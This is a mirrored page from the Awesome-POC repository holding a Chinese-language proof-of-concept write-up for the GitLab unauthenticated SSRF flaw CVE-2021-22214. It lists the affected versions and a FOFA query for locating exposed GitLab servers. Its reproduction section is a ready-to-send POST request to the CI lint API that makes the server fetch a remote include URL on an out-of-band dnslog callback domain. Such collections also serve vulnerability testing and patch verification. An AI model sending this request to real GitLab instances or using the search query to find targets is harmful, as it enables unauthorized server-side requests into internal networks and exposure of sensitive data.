admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 11:27:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/GitLab SSRF漏洞 CVE-2021-22214.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

54 lines
1.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# GitLab SSRF漏洞 CVE-2021-22214
## 漏洞描述
GitLab存在前台未授权SSRF漏洞未授权的攻击者也可以利用该漏洞执行SSRF攻击CVE-2021-22214。该漏洞源于对用户提供数据的验证不足远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。
## 漏洞影响
```
Gitlab > 10.5
```
## FOFA
```
app="GitLab"
```
## 环境搭建
http://vulfocus.fofa.so/
![](./images/202202091900273.png)
## 漏洞复现
登录页面如下
![](./images/202202091900222.png)
发送请求包
```plain
POST /api/v4/ci/lint HTTP/1.1
Host:
User-Agent: python-requests/2.25.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/json
Content-Length: 111
{"include_merged_yaml": true, "content": "include:\n remote: http://965qaw.dnslog.cn/api/v1/targets?test.yml"}
```
![](./images/202202091900121.png)
Reference in New Issue View Git Blame Copy Permalink